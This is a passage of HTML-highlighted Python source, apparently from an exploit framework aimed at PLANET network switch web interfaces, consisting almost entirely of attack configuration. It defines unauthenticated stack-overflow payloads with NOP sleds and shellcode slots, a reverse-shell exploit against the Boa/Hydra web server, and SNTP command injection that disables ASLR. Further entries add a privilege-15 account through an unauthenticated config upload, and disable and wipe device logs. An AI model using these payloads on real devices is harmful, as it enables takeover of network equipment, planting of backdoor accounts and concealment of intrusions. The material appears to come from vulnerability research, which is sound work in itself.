						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'stack_cgi_log'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
														<span class="token comment"># /sqfs/home/web/cgi-bin/dispatcher.cgi;  web_log_setting_post()</span>
						<span class="token string">'log_settings_set'</span><span class="token punctuation">:</span><span class="token number">0x46AC10</span><span class="token punctuation">,</span>	<span class="token comment"># Jump one after 'sw $ra'			# Disable Logging (address, binary dependent)</span>
														<span class="token comment"># /sqfs/home/web/cgi-bin/dispatcher.cgi;  web_log_file_del()</span>
						<span class="token string">'log_ramClear'</span><span class="token punctuation">:</span><span class="token number">0x46E368</span><span class="token punctuation">,</span>		<span class="token comment"># Jump one after 'sw $ra'			# Clean RAM log (address, binary dependent)</span>
														<span class="token comment"># /sqfs/home/web/cgi-bin/dispatcher.cgi;  web_log_file_del()</span>
						<span class="token string">'log_fileClear'</span><span class="token punctuation">:</span><span class="token number">0x46E368</span><span class="token punctuation">,</span>		<span class="token comment"># Jump one after 'sw $ra'			# Clean FILE log (address, binary dependent)</span>

						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'stack_cgi_sntp'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
														<span class="token comment"># /sqfs/home/web/cgi-bin/dispatcher.cgi; web_sys_sntp_post()</span>
						<span class="token string">'sys_timeSntp_set'</span><span class="token punctuation">:</span><span class="token number">0x42243C</span><span class="token punctuation">,</span>	<span class="token comment"># Jump one after 'sw $ra'			# Set SNTP Server (Inject CMD)</span>
														<span class="token comment"># /sqfs/home/web/cgi-bin/dispatcher.cgi; web_sys_sntp_post()</span>
						<span class="token string">'sys_timeSntpDel_set'</span><span class="token punctuation">:</span><span class="token number">0x42243C</span><span class="token punctuation">,</span>	<span class="token comment"># Jump one after 'sw $ra'			# Delete (address, binary dependent) </span>
														<span class="token comment"># /sqfs/home/web/cgi-bin/dispatcher.cgi; web_sys_time_post()</span>
						<span class="token string">'sys_timeSettings_set'</span><span class="token punctuation">:</span><span class="token number">0x424DE0</span><span class="token punctuation">,</span><span class="token comment"># Jump one after 'sw $ra'			# Enable/Disable (address, binary dependent)</span>

						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span> 

					<span class="token comment"># Interesting when there is a fresh heap with 0x00's (4 x 0x00 == MIPS NOP),</span>
					<span class="token comment"># and to fill wider area with sending '&amp;%8f%84%01=%8f%84%80%18' where:</span>
					<span class="token comment"># </span>
					<span class="token comment"># NOP's</span>
					<span class="token comment"># '24%04%FF=' : '=' will be replaced with 0x00, li $a0, 0xFFFFFF00</span>
					<span class="token comment"># '%24%04%FF%FF' : li $a0, 0xFFFFFFFF</span>
					<span class="token string">'heack_cgi_shell'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'cgi'</span><span class="token punctuation">:</span><span class="token string">'dispatcher.cgi'</span><span class="token punctuation">,</span>			<span class="token comment"># /sqfs/home/web/cgi-bin/dispatcher.cgi; main()</span>
						<span class="token string">'query'</span><span class="token punctuation">:</span><span class="token string">'username='</span><span class="token operator">+</span> self<span class="token punctuation">.</span>random_string<span class="token punctuation">(</span><span class="token number">112</span><span class="token punctuation">)</span> <span class="token operator">+</span><span class="token string">'_RA_START&amp;password='</span><span class="token operator">+</span> self<span class="token punctuation">.</span>random_string<span class="token punctuation">(</span><span class="token number">80</span><span class="token punctuation">)</span> <span class="token operator">+</span><span class="token string">'&amp;login=1'</span><span class="token operator">+</span> <span class="token punctuation">(</span><span class="token string">'&amp;%24%04%FF=%24%04%FF%FF'</span> <span class="token operator">*</span> <span class="token number">50</span><span class="token punctuation">)</span> <span class="token operator">+</span><span class="token string">'_SHELLCODE'</span><span class="token punctuation">,</span>
						<span class="token string">'START'</span><span class="token punctuation">:</span><span class="token number">0x10010104</span><span class="token punctuation">,</span>				<span class="token comment"># start: Stack overflow RA, used for searching NOP sled by blind jump</span>
						<span class="token string">'STOP'</span> <span class="token punctuation">:</span><span class="token number">0x10600604</span><span class="token punctuation">,</span>				<span class="token comment"># end: You may want to play with this if you dont get it working</span>
						<span class="token string">'usr_nop'</span><span class="token punctuation">:</span> <span class="token number">28</span><span class="token punctuation">,</span>					<span class="token comment"># NOP sled (shellcode will be tailed)</span>
						<span class="token string">'pwd_nop'</span><span class="token punctuation">:</span> <span class="token number">20</span><span class="token punctuation">,</span>					<span class="token comment"># filler/garbage (not used for something constructive)</span>
						<span class="token string">'align'</span><span class="token punctuation">:</span> <span class="token number">0</span><span class="token punctuation">,</span>						<span class="token comment"># Align opcodes in memory</span>
						<span class="token string">'stack'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>					<span class="token comment"># NOP and shellcode lays on: True = stack, False = Heap</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
				<span class="token punctuation">}</span><span class="token punctuation">,</span>
			<span class="token punctuation">}</span><span class="token punctuation">,</span>

		<span class="token punctuation">}</span>

		<span class="token comment">#</span>
		<span class="token comment"># Vendor templates, Vendor_ETag() will be merged to here</span>
		<span class="token comment"># (dont delete anything here thats not moved to Vendor_ETag())</span>
		<span class="token comment">#</span>

		Vendor_Template <span class="token operator">=</span> <span class="token punctuation">{</span>
			<span class="token comment">#</span>
			<span class="token string">'Planet'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
				<span class="token string">'vendor'</span><span class="token punctuation">:</span> <span class="token string">'PLANET Technology Corp.'</span><span class="token punctuation">,</span>
				<span class="token string">'modulus_uri'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
				<span class="token string">'info_leak'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
				<span class="token string">'info_leak_JSON'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
				<span class="token string">'info_leak_uri'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
				<span class="token string">'xsid'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
				<span class="token string">'xsid_uri'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
				<span class="token string">'login'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
					<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Login/Logout on remote device'</span><span class="token punctuation">,</span>
					<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
					<span class="token string">'json'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
					<span class="token string">'encryption'</span><span class="token punctuation">:</span><span class="token string">'clear'</span><span class="token punctuation">,</span>
					<span class="token string">'login_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/dispatcher.cgi?cmd=1'</span><span class="token punctuation">,</span>
					<span class="token string">'query'</span><span class="token punctuation">:</span><span class="token string">'username=USERNAME&amp;password=PASSWORD&amp;login=1'</span><span class="token punctuation">,</span>
					<span class="token string">'status_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/dispatcher.cgi?cmd=547'</span><span class="token punctuation">,</span>
					<span class="token string">'logout_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/dispatcher.cgi?cmd=3'</span><span class="token punctuation">,</span>
					<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
					<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
				<span class="token punctuation">}</span><span class="token punctuation">,</span>
				<span class="token string">'log'</span><span class="token punctuation">:</span><span class="token punctuation">{</span>
						<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Disable and clean logs'</span><span class="token punctuation">,</span>
						<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'json'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
						<span class="token string">'disable_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/dispatcher.cgi'</span><span class="token punctuation">,</span>
						<span class="token string">'disable_query'</span><span class="token punctuation">:</span><span class="token string">'LOGGING_SERVICE=0&amp;cmd=5121'</span><span class="token punctuation">,</span>
						<span class="token string">'status'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
						<span class="token string">'clean_logfile_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/dispatcher.cgi'</span><span class="token punctuation">,</span>
						<span class="token string">'clean_logfile_query'</span><span class="token punctuation">:</span><span class="token string">'cmd_5132=Clear+file+messages'</span><span class="token punctuation">,</span>
						<span class="token string">'clean_logmem_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/dispatcher.cgi'</span><span class="token punctuation">,</span>
						<span class="token string">'clean_logmem_query'</span><span class="token punctuation">:</span><span class="token string">'cmd_5132=Clear+buffered+messages'</span><span class="token punctuation">,</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
				<span class="token punctuation">}</span><span class="token punctuation">,</span>
				<span class="token comment"># Verify lacking authentication</span>
				<span class="token string">'verify'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'httpuploadbakcfg.cgi'</span><span class="token punctuation">:</span><span class="token punctuation">{</span>
							<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'response'</span><span class="token punctuation">:</span><span class="token string">'html'</span><span class="token punctuation">,</span>
							<span class="token string">'Content-Type'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span>
							<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Upload "backup-config" (PoC: Create invalid file to verify)'</span><span class="token punctuation">,</span>
							<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/httpuploadbakcfg.cgi'</span><span class="token punctuation">,</span>
							<span class="token string">'check_uri'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
							<span class="token string">'content'</span><span class="token punctuation">:</span><span class="token string">'dummy'</span><span class="token punctuation">,</span>
							<span class="token string">'content_check'</span><span class="token punctuation">:</span><span class="token string">' Invalid config file!!'</span><span class="token punctuation">,</span> <span class="token comment"># one 0x20 in beginning</span>
							<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
							<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
						<span class="token punctuation">}</span><span class="token punctuation">,</span>
						<span class="token string">'httpuploadruncfg.cgi'</span><span class="token punctuation">:</span><span class="token punctuation">{</span>
							<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'response'</span><span class="token punctuation">:</span><span class="token string">'html'</span><span class="token punctuation">,</span>
							<span class="token string">'Content-Type'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span>
							<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Upload/update "running-config" (PoC: Create invalid file to verify)'</span><span class="token punctuation">,</span>
							<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/httpuploadruncfg.cgi'</span><span class="token punctuation">,</span>
							<span class="token string">'check_uri'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
							<span class="token string">'content'</span><span class="token punctuation">:</span><span class="token string">'dummy'</span><span class="token punctuation">,</span>
							<span class="token string">'content_check'</span><span class="token punctuation">:</span><span class="token string">' Invalid config file!!'</span><span class="token punctuation">,</span> <span class="token comment"># one 0x20 in beginning</span>
							<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
							<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
						<span class="token punctuation">}</span><span class="token punctuation">,</span>
						<span class="token string">'httprestorecfg.cgi'</span><span class="token punctuation">:</span><span class="token punctuation">{</span>
							<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'response'</span><span class="token punctuation">:</span><span class="token string">'html'</span><span class="token punctuation">,</span>
							<span class="token string">'Content-Type'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span>
							<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Upload "startup-config" (PoC: Create invalid file to verify)'</span><span class="token punctuation">,</span>
							<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/httprestorecfg.cgi'</span><span class="token punctuation">,</span>
							<span class="token string">'check_uri'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
							<span class="token string">'content'</span><span class="token punctuation">:</span><span class="token string">'dummy'</span><span class="token punctuation">,</span>
							<span class="token string">'content_check'</span><span class="token punctuation">:</span><span class="token string">' Invalid config file!!'</span><span class="token punctuation">,</span> <span class="token comment"># one 0x20 in beginning</span>
							<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
							<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
						<span class="token punctuation">}</span><span class="token punctuation">,</span>
						<span class="token string">'httpupload.cgi'</span><span class="token punctuation">:</span><span class="token punctuation">{</span>
							<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'response'</span><span class="token punctuation">:</span><span class="token string">'html'</span><span class="token punctuation">,</span>
							<span class="token string">'Content-Type'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span>
							<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Upload/Upgrade "Firmware" (PoC: Create invalid file to verify)'</span><span class="token punctuation">,</span>
							<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/httpupload.cgi'</span><span class="token punctuation">,</span>
							<span class="token string">'check_uri'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
							<span class="token string">'content'</span><span class="token punctuation">:</span><span class="token string">'dummy'</span><span class="token punctuation">,</span>
							<span class="token string">'content_check'</span><span class="token punctuation">:</span><span class="token string">'Image Signature Error'</span><span class="token punctuation">,</span>
							<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
							<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
						<span class="token punctuation">}</span><span class="token punctuation">,</span>
						<span class="token string">'dispatcher.cgi'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span> <span class="token comment"># 'username' also suffer from stack overflow</span>
							<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Stack overflow in "username/password" (PoC: crash CGI)'</span><span class="token punctuation">,</span>
							<span class="token string">'response'</span><span class="token punctuation">:</span><span class="token string">'502'</span><span class="token punctuation">,</span>
							<span class="token string">'Content-Type'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/dispatcher.cgi?cmd=1'</span><span class="token punctuation">,</span>
							<span class="token string">'content'</span><span class="token punctuation">:</span><span class="token string">'username=admin&amp;password='</span><span class="token operator">+</span> self<span class="token punctuation">.</span>random_string<span class="token punctuation">(</span><span class="token number">184</span><span class="token punctuation">)</span> <span class="token operator">+</span> <span class="token string">'&amp;login=1'</span><span class="token punctuation">,</span>
							<span class="token string">'check_uri'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'content_check'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
							<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
						<span class="token punctuation">}</span><span class="token punctuation">,</span>
				<span class="token punctuation">}</span><span class="token punctuation">,</span>
				<span class="token string">'exploit'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
					<span class="token string">'heack_hydra_shell'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'[Boa/Hydra] Stack overflow in Boa/Hydra web server (PoC: reverse shell)'</span><span class="token punctuation">,</span>
						<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
						<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/httpupload.cgi?XXX'</span><span class="token punctuation">,</span> <span class="token comment"># Including alignment of opcodes in memory</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">False</span> <span class="token comment"># Boa/Hydra restart/watchdog, False = no restart, True = restart</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'priv15_account'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Upload/Update running-config (PoC: add priv 15 credentials)'</span><span class="token punctuation">,</span>
						<span class="token string">'json'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
						<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
						<span class="token string">'encryption'</span><span class="token punctuation">:</span><span class="token string">'md5'</span><span class="token punctuation">,</span>
						<span class="token string">'content'</span><span class="token punctuation">:</span><span class="token string">'Content-Type\n\nSYSTEM CONFIG FILE ::= BEGIN\nusername "USERNAME" secret encrypted PASSWORD\n\n------'</span><span class="token punctuation">,</span>
						<span class="token comment">#'encryption':'nopassword',</span>
						<span class="token comment">#'content':'Content-Type\n\nconfig-file-header\nusername "USERNAME" nopassword\n\n------', # Yep, working too</span>
						<span class="token string">'add_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/httpuploadruncfg.cgi'</span><span class="token punctuation">,</span>
						<span class="token string">'del_query'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span> 
						<span class="token string">'del_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/dispatcher.cgi?cmd=526&amp;usrName=USERNAME'</span><span class="token punctuation">,</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span> 
					<span class="token string">'sntp'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'SNTP command injection (PoC: disable ASLR)'</span><span class="token punctuation">,</span>
						<span class="token string">'json'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
						<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'enable_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/dispatcher.cgi'</span><span class="token punctuation">,</span>
						<span class="token string">'enable_query'</span><span class="token punctuation">:</span><span class="token string">'sntp_enable=1&amp;cmd=548'</span><span class="token punctuation">,</span>
						<span class="token string">'status_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/get.cgi?cmd=sys_timeSettings'</span><span class="token punctuation">,</span>
						<span class="token string">'inject_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/dispatcher.cgi'</span><span class="token punctuation">,</span>
						<span class="token string">'inject_query'</span><span class="token punctuation">:</span><span class="token string">'sntp_Server=`echo 0 &gt; /proc/sys/kernel/randomize_va_space`&amp;sntp_Port=123&amp;cmd=550'</span><span class="token punctuation">,</span>
						<span class="token string">'check_query'</span><span class="token punctuation">:</span><span class="token string">'sntp_Server=`cat /proc/sys/kernel/randomize_va_space &gt; /tmp/check`&amp;sntp_Port=123&amp;cmd=550'</span><span class="token punctuation">,</span>
						<span class="token string">'delete_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/dispatcher.cgi'</span><span class="token punctuation">,</span>
						<span class="token string">'delete_query'</span><span class="token punctuation">:</span><span class="token string">'sntp_Server=+&amp;sntp_Port=123&amp;cmd=550'</span><span class="token punctuation">,</span>
						<span class="token string">'disable_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/dispatcher.cgi'</span><span class="token punctuation">,</span>
						<span class="token string">'disable_query'</span><span class="token punctuation">:</span><span class="token string">'sntp_enable=0&amp;cmd=548'</span><span class="token punctuation">,</span>
						<span class="token string">'verify_uri'</span><span class="token punctuation">:</span><span class="token string">'/tmp/check'</span><span class="token punctuation">,</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token comment">#</span>
					<span class="token comment"># The stack overflow in 'username' and 'password' at same request are multipurpose.</span>
					<span class="token comment">#</span>

					<span class="token comment">#</span>
					<span class="token comment"># The trick to jump and execute:</span>
					<span class="token comment"># 1. Code: username=[garbage][RA + 0x58000000]&amp;password=[garbage][NULL termination]</span>
					<span class="token comment"># 2. [NULL termination] will overwrite 0x58 in RA so we can jump within the binary</span>
					<span class="token comment"># 3. We dont jump to beginning of the functions, we jump just after 'sw $ra,($sp)' (important)</span>
					<span class="token comment"># 4. We will also feed required function parameters, by adding them to '_CMD_'</span>
					<span class="token comment">#</span>
					<span class="token string">'stack_cgi_diag'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Stack overflow in "username/password" (PoC: Disable ASLR)'</span><span class="token punctuation">,</span>
						<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>

						<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/dispatcher.cgi?cmd=1'</span><span class="token punctuation">,</span>
						<span class="token string">'content'</span><span class="token punctuation">:</span><span class="token string">'username='</span><span class="token operator">+</span> self<span class="token punctuation">.</span>random_string<span class="token punctuation">(</span><span class="token number">212</span><span class="token punctuation">)</span> <span class="token operator">+</span><span class="token string">'_JUMP_&amp;password='</span><span class="token operator">+</span> self<span class="token punctuation">.</span>random_string<span class="token punctuation">(</span><span class="token number">180</span><span class="token punctuation">)</span> <span class="token operator">+</span><span class="token string">'&amp;_CMD_&amp;login=1'</span><span class="token punctuation">,</span>
						<span class="token string">'sys_ping_post_check'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
						<span class="token string">'sys_ping_post_SIGSEGV'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>		<span class="token comment"># SIGSEGV ?</span>

						<span class="token string">'workaround'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span>	<span class="token comment"># My LAB workaround</span>

						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>

					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'stack_cgi_log'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Stack overflow in "username/password" (PoC: Disable/Clean logs)'</span><span class="token punctuation">,</span>
						<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
						<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/dispatcher.cgi?cmd=1'</span><span class="token punctuation">,</span>
						<span class="token string">'content'</span><span class="token punctuation">:</span><span class="token string">'username='</span><span class="token operator">+</span> self<span class="token punctuation">.</span>random_string<span class="token punctuation">(</span><span class="token number">212</span><span class="token punctuation">)</span> <span class="token operator">+</span><span class="token string">'_JUMP_&amp;password='</span><span class="token operator">+</span> self<span class="token punctuation">.</span>random_string<span class="token punctuation">(</span><span class="token number">180</span><span class="token punctuation">)</span> <span class="token operator">+</span><span class="token string">'_CMD_&amp;login=1'</span><span class="token punctuation">,</span>

						<span class="token string">'log_settings_set_cmd'</span><span class="token punctuation">:</span><span class="token string">'&amp;LOGGING_SERVICE=0'</span><span class="token punctuation">,</span><span class="token comment"># Disable Logging CMD</span>
						<span class="token string">'log_settings_set_SIGSEGV'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>			<span class="token comment"># Disable Logging SIGSEGV ?</span>

						<span class="token string">'log_ramClear_cmd'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>						<span class="token comment"># Clean RAM log CMD</span>
						<span class="token string">'log_ramClear_SIGSEGV'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>				<span class="token comment"># Clean RAM log SIGSEGV ?</span>

						<span class="token string">'log_fileClear_cmd'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>						<span class="token comment"># Clean FILE log CMD</span>
						<span class="token string">'log_fileClear_SIGSEGV'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>				<span class="token comment"># Clean FILE log SIGSEGV ?</span>

						<span class="token string">'workaround'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span>	<span class="token comment"># My LAB workaround</span>
						<span class="token string">'verify_uri'</span><span class="token punctuation">:</span><span class="token string">'/tmp/check'</span><span class="token punctuation">,</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'stack_cgi_sntp'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Stack overflow in "username/password" (PoC: Disable ASLR)'</span><span class="token punctuation">,</span>
						<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
						<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/dispatcher.cgi?cmd=1'</span><span class="token punctuation">,</span>
						<span class="token string">'content'</span><span class="token punctuation">:</span><span class="token string">'username='</span><span class="token operator">+</span> self<span class="token punctuation">.</span>random_string<span class="token punctuation">(</span><span class="token number">212</span><span class="token punctuation">)</span> <span class="token operator">+</span><span class="token string">'_JUMP_&amp;password='</span><span class="token operator">+</span> self<span class="token punctuation">.</span>random_string<span class="token punctuation">(</span><span class="token number">180</span><span class="token punctuation">)</span> <span class="token operator">+</span><span class="token string">'_CMD_&amp;login=1'</span><span class="token punctuation">,</span>

						<span class="token string">'sys_timeSntp_set_cmd'</span><span class="token punctuation">:</span><span class="token string">'&amp;sntp_Server=`echo 0 &gt; /proc/sys/kernel/randomize_va_space`&amp;sntp_Port=123'</span><span class="token punctuation">,</span>
						<span class="token string">'sys_timeSntp_set_check'</span><span class="token punctuation">:</span><span class="token string">'&amp;sntp_Server=`cat /proc/sys/kernel/randomize_va_space &gt; /tmp/check`&amp;sntp_Port=123'</span><span class="token punctuation">,</span>

						<span class="token string">'sys_timeSntpDel_set_cmd'</span><span class="token punctuation">:</span><span class="token string">'&amp;sntp_Server=+&amp;sntp_Port=123'</span><span class="token punctuation">,</span>

						<span class="token string">'sys_timeSettings_set_cmd_enable'</span><span class="token punctuation">:</span><span class="token string">'&amp;sntp_enable=1'</span><span class="token punctuation">,</span>
						<span class="token string">'sys_timeSettings_set_cmd_disable'</span><span class="token punctuation">:</span><span class="token string">'&amp;sntp_enable=0'</span><span class="token punctuation">,</span>
						<span class="token string">'sys_timeSettings_set_SIGSEGV'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>		<span class="token comment"># SIGSEGV ?</span>

						<span class="token string">'workaround'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span>	<span class="token comment"># My LAB workaround</span>
						<span class="token string">'verify_uri'</span><span class="token punctuation">:</span><span class="token string">'/tmp/check'</span><span class="token punctuation">,</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span> 

					<span class="token comment">#</span>
